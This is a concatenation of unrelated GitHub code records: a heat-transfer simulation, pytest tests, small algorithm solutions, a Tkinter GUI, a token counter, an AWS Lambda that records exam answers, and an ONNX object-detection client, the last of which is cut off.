p])) * (T[-1, -1-1, p] - T[-1, -1, p]) + (2 * lambd * dt) / (ro * dx ** 2 * c(T[-1, -1, p])) * (T[-1-1, -1, p] - T[-1, -1, p])\r\n\r\n for m in range(1, Nx - 1):\r\n\r\n #loop for the bottom edge\r\n T[m, -1, p + 1] = T[m, -1, p] + (2 * dt * qd) / (ro * dy * c(T[m, -1, p])) + (lambd * dt) / (ro * dx ** 2 * c(T[m, -1, p])) * (T[m + 1, -1, p] + T[m - 1, -1, p] - 2*T[m, -1, p]) +\\\r\n (2 * lambd * dt) / (ro * dy ** 2 * c(T[m, -1, p])) * (T[m, 1, p] - T[m, 0, p])\r\n\r\n #loop for the top edge\r\n T[m, 0, p + 1] = T[m, 0, p] + (2 * dt * qh) / (ro * dy * c(T[m, 0, p])) + (lambd * dt) / (ro * dx ** 2 * c(T[m, 0, p])) * (T[m + 1, 0, p] + T[m - 1, 0, p] - 2*T[m, 0, p]) +\\\r\n (2 * lambd * dt) / (ro * dy ** 2 * c(T[m, 0, p])) * (T[m, -1 - 1, p] - T[m, -1, p])\r\n\r\n for n in range(1, Ny - 1):\r\n\r\n\r\n #loop for the left edge - under correction\r\n T[0, n, p + 1] = T[0, n, p] + (lambd * dt) / (ro * dy ** 2 * c(T[0, n, p])) * (T[0, n + 1, p] + T[0, n - 1, p] - 2 * T[0, n, p]) + \\\r\n (2 * lambd * dt) / (ro * dx ** 2 * c(T[0, n, p])) * (T[1, n, p] - T[0, n, p]) + \\\r\n (2 * dt) / (ro * dx * dy * c(T[0, n, p])) * (Q_conv(n, alpha, dy, Tvz, T, p) + Q_rad(dy, dd, rad_val, p, dt))\r\n\r\n #loop for the right edge\r\n T[-1, n, p + 1] = T[-1, n, p] + (2 * dt * qp) / (ro * dy * c(T[-1, n, p])) + (lambd * dt) / (ro * dy ** 2 * c(T[-1, n, p])) * (T[-1, n + 1, p] + T[-1, n - 1, p] - 2 * T[-1, n, p]) + \\\r\n (2 * lambd * dt) / (ro * dx ** 2 * c(T[-1, n, p])) * (T[-1 -1, n, p] - T[-1, n, p])\r\n #interior points\r\n T[m, n, p + 1] = T[m, n, p] + (lambd * dt) / (ro * dy ** 2 * c(T[m, n, p])) * (T[m, n + 1, p] + T[m, n - 1, p] - 2*T[m, n, p]) +\\\r\n (lambd * dt) / (ro * dx ** 2 * c(T[m, n, p])) * (T[m + 1, n, p] + T[m - 1, n, p] - 2*T[m, n, p])\r\n\r\n Tvz[:, p + 1] = np.roll(Tvz[:, p + 1], 1)\r\n Tvz_out.append(Tvz[0, p + 1])\r\n Tvz[0, p + 1] = T_ambient(Tamb_val_clean, p, dt)\r\n\r\n if (p>Ny):\r\n fitness = fitness + (Tvz[-1, p + 1] - T_set)**2\r\n\r\n return T, Tvz, Tvz_out, fitness, Q_sum #\r\n\r\n#EFFECTIVE HEAT CAPACITY\r\ndef ceff(T, c0, c1, Tpch, sigma):\r\n return c0 + c1 * np.exp((-(T - Tpch) * (T - Tpch)) / sigma)\r\n\r\n#2D PLOT\r\n# plt.figure()\r\n# plt.plot(Tvz_out[0:37000:600])\r\n# plt.plot(T_out[1, 1, 0:37000:600])\r\n# plt.plot(Tamb_val_clean[60*12:60*13])\r\n# plt.plot(rad_val[60*12:60*13])\r\n# plt.legend(['Outlet - Air temperature', 'PCM surface temperature', 'Inlet - Ambient temperature', 'Solar irradiation'])\r\n# plt.show()\r\n\r\n# fig, ax = plt.subplots()\r\n#\r\n# for i in range(len(T_out[0, 0, :])):\r\n# ax.cla()\r\n# ax.set_title(\"frame {}\".format(i))\r\n# heatmap2d(np.transpose(np.vstack((Tvz[:, i], T_out[:, :, i]))))\r\n#\r\n# plt.pause(0.1)\r\n# plt.clf()\r\n# #plt.imshow(T[:, :, 600])\r\n\r\n# \r\nx = [0.01, 41, 61300]\r\nT_out, Tvz, Tvz_out, f2, Q_sum = heat_2d(x)\r\n\r\n\r\n\r\n# print('Iteration number: ' + str(counter))\r\n# print('Elapsed time: ' + str(end - start))\r\n# print('Fitness: ' + str(f2))\r\n# print('Variables: Tpch, Tpch2, c0, c1, c2, sigma1, sigma2')\r\n# print('Current x: ' + str(x))\r\n# 
print('----------------------------------------------------------------')\r\n# list.append(f2)\r\n\r\n# plt.figure()\r\n# plt.plot(Tvz_out[0:-1])\r\n# plt.plot(T_out[1, 1, 0:-1])\r\n# plt.plot(Tamb_val_clean[start_hour])\r\n# #plt.plot(rad_val[60 * start_hour:int(60 * end_hour)])\r\n# plt.legend(['Outlet - Air temperature', 'PCM surface temperature', 'Inlet - Ambient temperature', 'Solar irradiation'])\r\n# plt.show()\r\nplt.figure(figsize=(20, 12))\r\nplt.subplot(231)\r\n#plt.figure(figsize=(17, 10), dpi=150)#, facecolor='w', edgecolor='k'\r\n\r\nplt.plot(Tvz_out[0:-1:600])\r\nplt.plot(T_out[0, -1, 0:-1:600])\r\nplt.plot(Tamb_val_clean[60 * start_hour: int(60 * end_hour)])\r\n#plt.plot(rad_val[60 * start_hour:int(60 * end_hour)])\r\n\r\nplt.xlabel('Time [min]')\r\nplt.ylabel('Temperature [°C]')\r\n# plt.title('Thickness: {:0.3f} m, Tpch = {:02.02f} °C, c1 = {:05.02f}'.format(x[0], x[1], x[2]))\r\n\r\nplt.legend(['Outlet - Air temperature', 'PCM surface temperature', 'Inlet - Ambient temperature'])\r\n\r\n\r\n\r\n# plt.figure(num=None, figsize=(17, 7), dpi=100, facecolor='w', edgecolor='k')\r\n# plt.subplot(1, 2, 1)\r\n# plt.plot(np.arange(t_start, t_max, dt), T[5, :p_max], np.arange(t_start, t_max, dt), core[:p_max])\r\n# plt.xlabel('Time iteration []')\r\n# plt.ylabel('Temperature [°C]')\r\n# plt.title('Temp. evolution comparison, middle of PCM layer-experiment vs simulation')\r\n# plt.legend(['Simulation', 'Experiment'])\r\n# print(T[5, :])\r\n\r\nplt.subplot(232)\r\nplt.plot(Tvz_out[0:-1:600])\r\nplt.plot(np.linspace(0, tmax/60, np.size(Tvz_out)), np.ones(np.size(Tvz_out)) * T_set,'--r')\r\nplt.xlabel('Time [min]')\r\nplt.ylabel('Temperature [°C]')\r\nplt.legend(['T_out - Outlet air temperature', 'T_set - Set outlet air temperature'])\r\n\r\n# plt.subplot(233)\r\n# plt.plot(np.linspace(x[1]-20, x[1]+20, 200), ceff(np.linspace(x[1]-20, x[1]+20, 200), c0, c1, x[1], sigma))\r\n# plt.xlabel('Temperature [°C]')\r\n# plt.ylabel('Effective heat capacity [J/(kg K)]')\r\n# plt.title('Opt ceff = {:04.0f} + {:05.0f}exp(-(T - {:02.2f})^2)/{:02.2f}'.format(c0, c1, x[1], sigma))\r\n\r\nplt.subplot(234)\r\nplt.plot(rad_val[60 * start_hour:int(60 * end_hour)], 'r') #rad_val[60 * start_hour:int(60 * end_hour)]\r\nplt.xlabel('Time [min]')\r\nplt.ylabel('Solar irradiance [W/m^2]')\r\n\r\nplt.subplot(235)\r\nplt.plot(np.linspace(0, tmax/60, np.size(Q_sum)), Q_sum) #np.linspace(0, tmax/60, np.size(Q_sum)\r\nplt.xlabel('Time [min]')\r\nplt.ylabel('Convective heat flux into PCM [J/min]')\r\n#print(Q_sum[-10:])\r\n\r\n# res = (Tvz_out[0:-1:600] - np.ones(np.size(Tvz_out))\r\n\r\nplt.subplot(236)\r\nplt.plot(np.linspace(0, tmax / 60, np.size(Tvz_out[0:-1:600])), (Tvz_out[0:-1:600] - np.ones(np.size(Tvz_out[0:-1:600])) * T_set), '--g')\r\nplt.xlabel('Time [min]')\r\nplt.ylabel('Temperature residuum [°C]')\r\n\r\n# plt.figure()\r\n# plt.plot(np.linspace(41 - 20, 41 + 20, 200),\r\n# ceff(np.linspace(41 - 10, 41 + 10, 200), 2000, 61300, 41, 2.1))\r\n# plt.xlabel('Temperature [°C]')\r\n# plt.ylabel('Effective heat capacity [J/(kg K)]')\r\n# plt.title('ceff(T) = {:04.0f} + {:05.0f}exp(-(T - {:02.2f})^2)/{:02.2f}'.format(2000, 61300, 41, 2.1))\r\n\r\nplt.show()\r\n\r\n\r\n\r\n","repo_name":"MartinZal/PRES2020","sub_path":"heat_2d_validation_REWORK.py","file_name":"heat_2d_validation_REWORK.py","file_ext":"py","file_size_in_byte":11437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15752711645","text":"# -*- coding: utf-8 -*-\n# @File : test_calc.py\n# 
@Author : Elf\n# @Time : 2021/2/3 23:24\n\n\nfrom HogwartsLG6.taskwork.stage4_record_pytest.common.calc import Calculator\nimport pytest\nimport yaml\n\nwith open(\"./datas/calc.yml\", encoding='utf-8') as f:\n f = yaml.safe_load(f)\n\n add = f[\"add\"]\n add_datas = add[\"datas\"]\n add_myid = add[\"myid\"]\n\n div = f[\"div\"]\n div_datas = div[\"datas\"]\n div_myid = div[\"myid\"]\n\n\nclass TestCalc:\n def setup_class(self):\n print(\"【开始计算加法和除法】\")\n self.calc = Calculator()\n\n def teardown_class(self):\n print(\"【加法和除法计算结束】\")\n\n def setup(self):\n print(\"用例执行开始...\")\n\n def teardown(self):\n print(\"用例执行结束...\")\n\n @pytest.mark.parametrize(\n 'a, b, expect',\n add_datas,\n ids=add_myid\n )\n def test_add(self, a, b, expect):\n result = self.calc.add(a, b)\n if isinstance(result, float):\n result = round(result, 2)\n assert result == expect\n\n @pytest.mark.parametrize(\n 'a, b, expect',\n div_datas,\n ids=div_myid\n )\n def test_div(self, a, b, expect):\n result = self.calc.div(a, b)\n if isinstance(result, float):\n result = round(result, 2)\n assert result == expect\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"fatfatfatFatTiger/HogwartsLG6","sub_path":"taskwork/stage04_record_pytest/testing/test_calc.py","file_name":"test_calc.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72116780057","text":"from tkinter import *\n\nroot = Tk()\n# root.attributes('-fullscreen',True) // this attribute show frame in full screen\nroot.title(\"Parking System Design by DNR\")\n\n\ndef showTitle():\n titleLabel = Label(root, text=\"Smart Parking System\", font=(\"Helvetica\", 15), width=30, height=3)\n titleLabel.pack()\n\n\ndef select_Image_From_System():\n print(\"ok\")\n\n\ndef exit_command():\n root.quit()\n\n\nshowTitle()\nexit_button = Button(root, text=\"EXIT\", command=exit_command, bg=\"brown\", font=(\"Helvetica\", 15), fg=\"white\", bd=4,\n padx=2, pady=4)\nexit_button.pack()\nexit_button.place(relx=\"0.8\", rely=\"0.9\")\n\nimage_from_file_btn = Button(root, text=\"Select Image From File System\", bg=\"yellow\", font=(\"Helvetica\", 15),\n fg=\"green\", bd=4, padx=2, pady=4, command=select_Image_From_System)\nimage_from_file_btn.pack()\nimage_from_file_btn.place(relx=\"0.05\", rely=\"0.2\")\n\n# titleLabel.grid(column=0,row=1,padx=150,pady=5) // show label in specific location\n# myLabel.pack()\n# Window frame size\nroot.geometry(\"600x600\")\n# set minimum window size value\nroot.minsize(200, 200)\n# set maximum window size value\nroot.maxsize(800, 800)\nroot.mainloop()\n","repo_name":"Nc-upadhyay/ParkEasePro","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72462843738","text":"from sys import stdin\r\n\r\ndef tarifa(calls) -> str:\r\n mile, juice = 0, 0\r\n for call in calls:\r\n n = 0\r\n while not(30*n<=call<= 30*(n+1)-1): n += 1\r\n mile += 10*(n+1)\r\n n = 0\r\n while not(60*n<=call<= 60*(n+1)-1): n += 1\r\n juice += 15*(n+1)\r\n\r\n if mile == juice:\r\n return \"Mile Juice \" + str(mile)\r\n elif mile < juice:\r\n return \"Mile \" + str(mile)\r\n else: return \"Juice \" + str(juice)\r\n\r\ndef main():\r\n t = int(stdin.readline().strip())\r\n SALIDA = \"\"\r\n for i in range(t):\r\n c = stdin.readline().strip()\r\n calls = [int(c) for c in stdin.readline().split()]\r\n SALIDA += \"Case {0}: {1}\\n\".format(i+1, 
tarifa(calls))\r\n    print(SALIDA.strip())\nmain()\r\n    \r\n","repo_name":"aanzolaavila/competitive-problems","sub_path":"Maratones/Basica 2015-2/corregidos/tariff.py","file_name":"tariff.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70769353817","text":"\"\"\"\n5\n0K0K0\nK000K\n00K00\nK000K\n0K0K0\n\"\"\"\n\n\ndef read_board():\n rows = int(input())\n return [list(input()) for _ in range(rows)]\n\n\ndef boundaries(board, row, col):\n if row in range(len(board)) and col in range(len(board[0])):\n return True\n return False\n\n\ndef calculate_attacks(board, row, col):\n tgt_coor = [(-1, -2), (-2, -1), (-2, 1), (-1, 2), (1, 2), (2, 1), (2, -1), (1, -2)]\n attacks = 0\n for coor in tgt_coor:\n tgt_row, tgt_col = coor\n tgt_row += row\n tgt_col += col\n if boundaries(board, tgt_row, tgt_col):\n if board[tgt_row][tgt_col] == 'K':\n attacks += 1\n return attacks\n\n\ndef find_max_attack(board):\n max_attack = 0\n max_attack_coor = ()\n for row in range(len(board)):\n for col in range(len(board[0])):\n if board[row][col] == 'K':\n attacks = calculate_attacks(board, row, col)\n if attacks > max_attack:\n max_attack = attacks\n max_attack_coor = (row, col)\n return max_attack, max_attack_coor\n\n\ndef remove_knight(board, removed):\n max_attack, max_coor = find_max_attack(board)\n if max_attack == 0:\n return removed\n max_row, max_col = max_coor\n board[max_row][max_col] = '0'\n removed += 1\n return remove_knight(board, removed)\n\n\nmatrix = read_board()\nprint(remove_knight(matrix, 0))\n","repo_name":"StanDobrev11/Python_Advanced","sub_path":"07_Multidimensional_Lists_-_Exercise_2/03_knights_ines.py","file_name":"03_knights_ines.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9965340861","text":"from typing import List\n\nimport tiktoken\n\nfrom vo.ai_model import AiModel\n\nDEFAULT_ENCODING: str = \"cl100k_base\"\n\n\ndef calculate_token_amount(ai_model: AiModel, content: List[dict], return_messages: List[str]):\n \"\"\"Returns the number of tokens of the content.\n Based on the OpenAI cookbook.\n https://github.com/openai/openai-cookbook/blob/main/examples/How_to_count_tokens_with_tiktoken.ipynb\"\"\"\n try:\n encoding = tiktoken.encoding_for_model(ai_model)\n except KeyError:\n return_messages.append(\"Warning: model not found. Using cl100k_base encoding.\")\n encoding = tiktoken.get_encoding(DEFAULT_ENCODING)\n if ai_model == AiModel.GPT_3_5_TURBO:\n return_messages.append(\n \"Warning: gpt-3.5-turbo may change over time. Returning num tokens assuming gpt-3.5-turbo-0301.\"\n )\n return calculate_token_amount(AiModel.GPT_3_5_TURBO_0301, content, return_messages)\n elif ai_model == AiModel.GPT_4:\n return_messages.append(\"Warning: gpt-4 may change over time. Returning num tokens assuming gpt-4-0314.\")\n return calculate_token_amount(AiModel.GPT_4_0314, content, return_messages)\n elif ai_model == AiModel.GPT_3_5_TURBO_0301:\n tokens_per_message = 4 # every message follows <|start|>{role/name}\\n{content}<|end|>\\n\n tokens_per_name = -1 # if there's a name, the role is omitted\n elif ai_model == AiModel.GPT_4_0314:\n tokens_per_message = 3\n tokens_per_name = 1\n else:\n raise NotImplementedError(\n f\"\"\"num_tokens_from_messages() is not implemented for model {ai_model}. 
See https://github.com/openai/openai-python/blob/main/chatml.md for information on how messages are converted to tokens.\"\"\")\n    num_tokens = 0\n    for message in content:\n        num_tokens += tokens_per_message\n        for key, value in message.items():\n            num_tokens += len(encoding.encode(value))\n            if key == \"name\":\n                num_tokens += tokens_per_name\n    num_tokens += 3  # every reply is primed with <|start|>assistant<|message|>\n    return num_tokens\n","repo_name":"pavlass2/token_calculator","sub_path":"token_calculator.py","file_name":"token_calculator.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29296404414","text":"\"\"\" Six Degrees of Kevin Bacon \"\"\"\nimport sys\ninput = sys.stdin.readline\nfrom collections import deque\n\n# BFS traversal\ndef bfs(start):\n    queue = deque([start])\n    visited[start] = 1\n\n    while queue:\n        target = queue.popleft()\n        \n        # Explore friendships: visit any friend that has not been visited yet.\n        for i in graph[target]:\n            if not visited[i]:\n                # Record the number of steps needed to reach this friend\n                visited[i] = visited[target] + 1\n                queue.append(i)\n\n# Read the graph\nn, m = map(int, input().split())\ngraph = [[] for _ in range(n+1)]\nfor _ in range(m):\n    a, b = map(int, input().split())\n    graph[a].append(b)\n    graph[b].append(a)\n\n# Kevin Bacon numbers\nresult = []\nfor i in range(1, n+1):\n    visited = [0] * (n+1)\n    bfs(i)\n    result.append(sum(visited))\n\nprint(result.index(min(result)) + 1)","repo_name":"InryeolChoi/baekjoon","sub_path":"class_3/1389.py","file_name":"1389.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"584310063","text":"'''\n@Author: \nDate of creation: 2018:12:28 1:10:11\nPurpose of the micro service: \n'''\n\n'''\nANY TODO\n\n'''\n\n#IMPORT MODULES\nimport json\nfrom os import environ\nimport WOHeader\nimport db_utility\nimport pymongo\nimport datetime\nimport random\nimport boto3\n#CONSTANTS\nMISSING_ERROR_MSG = \"Missing required parameter in the request\"\nUNAUTHENTICATION_ERROR_MSG = \"Unauthenticated access. 
Please give the valid token\"\nDATABASE_CONNECTION_ERROR = \"Failed to insert in the Database\"\n\n#TEST EVENT\ntestEvent = { \"body\" : {\"candidateToken\":\"mxaawaopld\",'questionId':2,'sort_order':4,'answer':{'mcq':[1,2],'videoUrl':\"youtube.com\",\"textUrl\":\"slack.com\"}}}\nrequiredParams = [\"candidateToken\",\"questionId\",'answer']\n\ndef checkAllRequiredValuesPresent(request):\n\tfor param in requiredParams:\n\t\tif(param not in request):\n\t\t\tprint(\"The value \"+param+\" missing\")\n\t\t\treturn False\t\n\treturn True\n\ndef validateRequest(request):\n\theaderValidation = True\n\n\t'''\n\tBOTO3 TO VALUDATE THE HEADER IF NEEDED\n\tcheck the environment flag (\"isHeaderValidationRequired\")\n\t'''\n\tif('candidateToken' not in request['body'] and 'testMode' not in request['body'] and environ.get('isHeaderValidationRequired')):\n\t\trequestBody = WOHeader.run(request)\n\t\tif(requestBody['authenticationCode'] !=\"200\"):\n\t\t\theaderValidation = False\n\telse:\n\t\trequestBody = request['body']\n\t'''\n\tVALIDATE CANDIDATE TOKEN\n\t'''\n\tif('candidateToken' in requestBody):\n\t\tcandidateInfo = validateCandidate(requestBody)\n\t\trequestBody['candidate'] = candidateInfo\n\n\tresponse = {}\n\tif(not headerValidation):\n\t\tprint(UNAUTHENTICATION_ERROR_MSG)\n\t\tresponse = {\"error\":UNAUTHENTICATION_ERROR_MSG,\"errorCode\":404}\n\telif(not checkAllRequiredValuesPresent(requestBody)):\n\t\tprint(MISSING_ERROR_MSG)\n\t\tresponse = {\"error\":MISSING_ERROR_MSG, \"errorCode\":402}\n\t'''\n\tBUSINESS LOGIC VALIDATION HERE\n\t'''\n\tif \"error\" not in response:\n\t\tresponse = requestBody\n\treturn response\n \ndef validateCandidate(requestBody):\n\ttestDetail=db_utility.fetch_where(\"test\",{\"token\":requestBody['candidateToken']})\n\tif len(testDetail)==0:\n\t\treturn False\n\telse:\n\t\tif (testDetail[0]['is_active']):\n\t\t\torgDetail=db_utility.fetch_where(\"organization_details\",{\"organization_id\":testDetail[0]['organization_id']})[0]\n\t\t\tif (orgDetail['is_active']):\n\t\t\t\tquestionSetDetail=db_utility.fetch_where(\"question_set\",{\"question_set_id\":testDetail[0]['question_set_id']})[0]\n\t\t\t\tif (questionSetDetail['is_active']):\n\t\t\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\ndef lambda_handler(event,context):\n\tproxyResponse = {}\n\tresponse = {}\n\tproxyResponse['headers'] = {\"Access-Control-Allow-Methods\":\"*\", \"Access-Control-Allow-Headers\":\"*\", \"Access-Control-Allow-Origin\":\"*\"}\n\n\tvalidRequest = validateRequest(event)\n\tif('error' in validRequest):\n\t\tproxyResponse['statusCode'] = validRequest['errorCode']\n\t\tproxyResponse['error'] = validRequest['error']\n\telse:\n\t\t'''\n\t\tBUSINESS LOGIC STARTS HERE\n\t\t'''\t\n\t\t# print(validRequest)\n\t\tcandidateToken=validRequest['candidateToken']\n\t\ttestDetail=db_utility.fetch_where(\"test\",{\"token\":candidateToken})[0]\n\t\ttestId=testDetail['test_id']\n\t\t# questionSetDetail=db_utility.fetch_where(\"question_set\",{\"question_set_id\":testDetail['question_set_id']})[0]\n\t\t# sampleQuestionSetDetails=db_utility.fetch_where(\"question_set\",{\"question_set_id\":questionSetDetail['sample_question_set_id']})[0]\n\t\t# print(sampleQuestionSetDetails['question_list'])\n\t\tquestionId=validRequest['questionId']\n\t\tquestionDetail=db_utility.fetch_where('question_master',{'question_id':questionId})[0]\n\t\tanswer=validRequest['answer']\n\t\tprint(answer)\n\t\tif 
questionDetail['question_type_id']==1:\n\t\t\tparam={}\n\t\t\tparam['response_id']=db_utility.fetch_next_id(\"test_response\",\"response_id\")\n\t\t\tparam[\"_id\"]=param['response_id']\n\t\t\tparam['question_id']=validRequest['questionId']\n\t\t\tparam['test_id']=testId\n\t\t\tparam['answer_mcq']=answer['mcq']\n\t\t\tparam['submitted_at']=datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S\")\n\t\telif questionDetail['question_type_id']==2:\n\t\t\tparam={}\n\t\t\tparam['response_id']=db_utility.fetch_next_id(\"test_response\",\"response_id\")\n\t\t\tparam[\"_id\"]=param['response_id']\n\t\t\tparam['question_id']=validRequest['questionId']\n\t\t\tparam['test_id']=testId\n\t\t\tif 'videoUrl' in answer:\n\t\t\t\tparam['video_url']=answer['videoUrl']\n\t\t\tif 'textUrl' in answer:\n\t\t\t\tparam['text_url']=answer['textUrl']\n\t\t\tparam['submitted_at']=datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S\")\n\t\tdata=db_utility.insert_data_one('test_response',param)\n\t\t# print(\"1\")\n\t\t# print(data)\n\t\tif data==\"200\":\n\t\t\ttestQuestionTracker=db_utility.fetch_where_and('test_question_tracker',[{'test_id':testId,'question_id':questionId}])[0]\n\t\t\tparam={}\n\t\t\tcurrentSortOrder=testQuestionTracker['sort_order']\n\t\t\tprint(currentSortOrder)\n\t\t\tparam=testQuestionTracker\n\t\t\tparam['submit_status']=True\n\t\t\ttrackerData=db_utility.update_data_one('test_question_tracker',{\"question_tracker_id\":testQuestionTracker['question_tracker_id']},param)\n\t\t\t# print(data)\n\t\tif trackerData==\"200\":\n\t\t\tparam={}\n\t\t\tparam['tracker_id']=db_utility.fetch_next_id(\"log_tracker\",\"tracker_id\")\n\t\t\tparam['_id']=param['tracker_id']\n\t\t\tparam['test_id']=testId\n\t\t\tparam['activity_type_id']=\"004\"\n\t\t\tparam['activity_time']=datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S\")\n\t\t\t# logData=db_utility.insert_data_one('log_tracker',param)\n\t\t\tlogData=\"200\"\n\t\tif logData==\"200\":\n\t\t\tprint(\"Data Inserted\")\n\t\t\t# sortOrder=0\n\t\t\tsortOrder=currentSortOrder+1\n\t\t\tprint(sortOrder)\n\t\t\twhile True:\n\t\t\t\tnextQuestionId=db_utility.fetch_where('test_question_tracker',{'sort_order':sortOrder,'test_id':testId})\t\t\t\t\n\t\t\t\tif (len(nextQuestionId)>0 and not nextQuestionId[0]['submit_status']):\n\t\t\t\t\tnextQuestionId=nextQuestionId[0]['question_id']\n\t\t\t\t\tbreak\n\t\t\t\telif (len(nextQuestionId)>0 and nextQuestionId[0]['submit_status'] and sortOrder!=currentSortOrder):\n\t\t\t\t\tsortOrder=sortOrder+1\n\t\t\t\telif (len(nextQuestionId)==0 and sortOrder!=currentSortOrder):\n\t\t\t\t\tsortOrder=1\n\t\t\t\telif (len(nextQuestionId)>0 and sortOrder==currentSortOrder):\n\t\t\t\t\tnextQuestionId=0\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tnextQuestionId=0\n\t\t\t\t\tbreak\n\t\tif nextQuestionId==0:\n\t\t\tparam={}\n\t\t\tparam['test_ended']=True\n\t\telse:\n\t\t\tclient = boto3.client('lambda',region_name = environ['Region'])\n\t\t\t# print(\"Invoking AkriValidateToken micro service to validate token\")\n\t\t\tnextQuestion = client.invoke(\n\t\t\tFunctionName='WO-'+environ['stage']+'-LookupQuestion',\n\t\t\tInvocationType='RequestResponse',\n\t\t\tPayload=json.dumps({\"body\":{'questionId': nextQuestionId,\"candidateToken\":candidateToken}})\n\t\t\t)\n\t\t\t\n\t\t\tnextQuestion= json.loads(nextQuestion['Payload'].read().decode(\"utf-8\"))\n\t\t\tparam={}\n\t\t\tparam=nextQuestion['body']\n\t\t\tparam=json.loads(param)\n\t\t\tparam['sort_order']=sortOrder\n\t\t\tparam['test_ended']=False\n\t\t\tprint(param)\n\t\t\t\t\n\t\t\tif 
len(param)>0:\n\t\t\t\tprint(\"Data Fetched\")\n\t\t\t\t# param=questionDetail['body']\n\t\t\telse:\n\t\t\t\tparam['statusCode']=400\n\t\t\t\tparam['Error']=DATABASE_CONNECTION_ERROR\n\t\tresponse=param\n\t\t'''\n\t\tBUSINESS LOGIC ENDS HERE BY RETURNING RESPONSE JSON\n\t\t'''\t\n\t\tproxyResponse['statusCode'] = 200\n\t\t# response={}\n\t\t# print(response)\n\t\tproxyResponse['body'] = json.dumps(response)\n\tprint(proxyResponse)\n\treturn proxyResponse\n\n# lambda_handler(testEvent,100)\n\n","repo_name":"eaglecoder1023/Lambda_functions","sub_path":"WOAnswerSubmission/WOAnswerSubmission.py","file_name":"WOAnswerSubmission.py","file_ext":"py","file_size_in_byte":7164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36562306859","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/2/3 16:42\n# @Author : Jclian91\n# @File : ssd_model_predict_using_onnx_runtime_server.py\n# @Place : Yangpu, Shanghai\n# Import some dependency libraries that we are going to need to run the SSD model\n\nimport numpy as np\nimport assets.onnx_ml_pb2 as onnx_ml_pb2\nimport assets.predict_pb2 as predict_pb2\nimport requests\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\n# Load the raw image\ninput_shape = (1, 3, 1200, 1200)\nimg = Image.open(\"assets/blueangels.jpg\")\nimg = img.resize((1200, 1200), Image.BILINEAR)\n\n# Preprocess and normalize the image\n\nimg_data = np.array(img)\nimg_data = np.transpose(img_data, [2, 0, 1])\nimg_data = np.expand_dims(img_data, 0)\nmean_vec = np.array([0.485, 0.456, 0.406])\nstddev_vec = np.array([0.229, 0.224, 0.225])\nnorm_img_data = np.zeros(img_data.shape).astype('float32')\nfor i in range(img_data.shape[1]):\n norm_img_data[:, i, :, :] = (img_data[:,i,:,:]/255 - mean_vec[i]) / stddev_vec[i]\n # norm_img_data[:, i, :, :] = img_data[:, i, :, :] / 255\n\n# Create request message to be sent to the ORT server\n\ninput_tensor = onnx_ml_pb2.TensorProto()\ninput_tensor.dims.extend(norm_img_data.shape)\ninput_tensor.data_type = 1\ninput_tensor.raw_data = norm_img_data.tobytes()\n\nrequest_message = predict_pb2.PredictRequest()\n\n# For your model, the inputs name should be something else customized by yourself. Use Netron to find out the input name.\nrequest_message.inputs[\"image\"].data_type = input_tensor.data_type\nrequest_message.inputs[\"image\"].dims.extend(input_tensor.dims)\nrequest_message.inputs[\"image\"].raw_data = input_tensor.raw_data\n\ncontent_type_headers = ['application/x-protobuf', 'application/octet-stream', 'application/vnd.google.protobuf']\n\nfor h in content_type_headers:\n request_headers = {\n 'Content-Type': h,\n 'Accept': 'application/x-protobuf'\n }\n\n# Inference run using ORT server\n# Change the number 9001 to the appropriate port number if you had changed it during ORT Server docker instantiation\n\nPORT_NUMBER = 9001 # Change appropriately if needed based on any changes when invoking the server in the pre-requisites\ninference_url = \"http://192.168.4.193:\" + str(PORT_NUMBER) + \"/v1/models/default/versions/1:predict\"\nresponse = requests.post(inference_url, headers=request_headers, data=request_message.SerializeToString())\n\n# Parse response message\n\nresponse_message = predict_pb2.PredictResponse()\nresponse_message.ParseFromString(response.content)\n\n# For your model, the outputs names should be something else customized by yourself. 
Use Netron to find out the outputs names.\nbboxes = np.frombuffer(response_message.outputs['bboxes'].raw_data, dtype=np.float32)\nlabels = np.frombuffer(response_message.outputs['labels'].raw_data, dtype=np.int64)\nscores = np.frombuffer(response_message.outputs['scores'].raw_data, dtype=np.float32)\n\nprint('Boxes shape:', response_message.outputs['bboxes'].dims)\nprint('Labels shape:', response_message.outputs['labels'].dims)\nprint('Scores shape:', response_message.outputs['scores'].dims)\n\n# Display image with bounding boxes and appropriate class\n\n# Parse the list of class labels\nclasses = [line.rstrip('\\n') for line in open('assets/coco_classes.txt')]\n\n# Plot the bounding boxes on the image\nplt.figure()\nfig, ax = plt.subplots(1, figsize=(12, 9))\nax.imshow(img)\n\nresized_width = 1200 # we resized the original image, remember ?\nresized_height = 1200\nnum_boxes = 6 # we limit displaying to just 10 boxes to avoid clogging the result image with boxes\n# The results are already sorted based on box confidences, so we just pick top N boxes without sorting\n\nfor c in range(num_boxes):\n base_index = c * 4\n y1, x1, y2, x2 = bboxes[base_index] * resized_height, bboxes[base_index + 1] * resized_width, bboxes[\n base_index + 2] * resized_height, bboxes[base_index + 3] * resized_width\n color = 'blue'\n box_h = (y2 - y1)\n box_w = (x2 - x1)\n bbox = 